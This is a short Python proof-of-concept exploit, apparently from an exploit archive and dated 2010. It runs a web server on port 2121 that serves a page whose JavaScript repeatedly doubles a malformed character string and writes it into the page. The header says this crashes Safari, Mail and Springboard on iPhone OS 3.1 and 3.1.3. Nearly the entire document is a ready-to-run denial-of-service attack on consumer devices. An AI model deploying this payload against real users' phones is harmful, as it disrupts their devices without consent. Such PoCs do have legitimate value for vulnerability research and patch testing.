#!/usr/bin/python
#iPhone Springboard crash PoC by Chase Higgins. Devices tested: iPhone 2G @ OS 3.1, iPhone 3GS @ 3.1.3 #this script acts as webserver, and causes Safari, as well as Mail and Springboard to crash #all these apps crash after running this exploit on the iPhone. Unable to debug any of these processes as the gdb on my #device is acting up, original iPhone is just too low memory to further test this exploit, so I am releasing it
# Exploit Title: iPhone Springboard Malformed Character Crash PoC # Date: 3/15/2010 # Author: Chase Higgins # Software Link: apple.com/iphone/ # Version: iPhone 2G, iPhone 3GS # Tested on: iPhone OS 3.1, and iPhone OS 3.1.3 # CVE : # Code : none
import sys, socket;
def main(): html = """ <html> <head> <script> function triggerCrash(){ evil_div = document.getElementById('evilDiv'); var evil_string = "\x4e\x5b\x01"; i = 0;
while (i < 1000){ evil_string = evil_string + evil_string; }
evil_div.innerHTML = evil_string; } </script> </head> <body onLoad="triggerCrash()"> <div id="evilDiv"> </div> </body> </html> """;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.bind(('',2121)); s.listen(1); while True: channel, details = s.accept(); print channel.recv(1024); channel.send(html); channel.close(); main();
|